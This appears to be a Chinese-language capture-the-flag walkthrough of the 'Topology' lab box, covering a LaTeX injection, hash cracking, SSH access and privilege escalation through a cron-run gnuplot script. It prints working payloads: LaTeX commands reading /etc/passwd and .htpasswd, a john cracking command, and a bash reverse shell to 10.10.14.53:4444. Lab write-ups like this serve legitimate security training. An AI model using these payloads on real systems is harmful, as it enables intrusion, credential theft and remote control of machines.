---

Topology 测试过程

1 端口扫描

---

nmap -sC -sV 10.129.23.12

2 漏洞探测

---

    端口扫描发现22和80端口，访问80端口，发现LaTeX方程生成器，访问该按钮发现子域： latex.topology.htb。

    将域名添加到hosts文件中

echo "10.129.23.12 topology.htb latex.topology.htb" | sudo tee -a /etc/hosts

    1.使用搜索引擎查找LaTeX相关漏洞

   查找到 LaTex 对用户输入进行解析生成PNG图像，存在注入漏洞。

    2.LaTeX注入漏洞测试 读取 /etc/passwd

# payload 单行输出
\input{/etc/passwd}
#使用 \ $ 对payload进行包装 
$\input{/etc/passwd}$

#payload 多行输出
$\lstinputlisting{/etc/passwd}$

   3.读取Apache默认配置文件，获取到dev、stats等子域

$\lstinputlisting{/etc/apache2/sites-available/000-default.conf}$

   发现默认配置中存在dev、stats等子域，将子域添加到 hosts文件

echo "10.129.23.12 dev.topology.htb stats.topology.htb" | sudo tee -a /etc/hosts

   4.读取.htaccess文件，在文件内容中发现/.htpasswd文件

$\lstinputlisting{/var/www/dev/.htaccess}$

   5.读取/var/www/dev/.htpasswd，发现用户名及hash密码

$\lstinputlisting{/var/www/dev/.htpasswd}$

   6.对hash密码进行破解，获取到密码 calculus20

echo 'vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0' > hash.txt
john --wordlist=rockyou.txt hash.txt

   7.网站开启22端口，使用 vdaisley：calculus20

ssh vdaisley@topology.htb

三 权限提升

---

   1.本地开启web服务

python3 -m http.server 8000

   2.使用wget上传pspy pspy工具在非root权限下可以监控linux进程

   pspy工具地址：https://github.com/DominicBreuker/pspy?tab=readme-ov-file

wget http://10.10.14.53:8000/pspy64
chmod +x ./pspy64
./pspy64

   3.在pspy监控下，发现/opt/gnuplot/getdata.sh脚本

/bin/sh /opt/gnuplot/getdata.sh
/bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} \;

   pspy工具执行结果显示，通过find命令在 /opt/gnuplot/ 目录下，执行*.plt脚本，如果在*.plt可以写入反弹shell脚本，即可通过执行*.plt文件获取权限。

   4.在*.plt文件中写入反弹shell脚本

   查看gnuplot相关命令文档，发现system()命令可进行命令执行。gnuplot命令文档地址：http://gnuplot.info/docs_5.5/loc18483.html

#启动监听器
ncat -lnvp 4444

# 新建 shell.plt脚本文件
vim /opt/gnuplot/shell.plt

# 反弹shell payload
shell = system("/bin/bash -c '/bin/sh -i >& /dev/tcp/10.10.14.53/4444 0>&1'")
print shell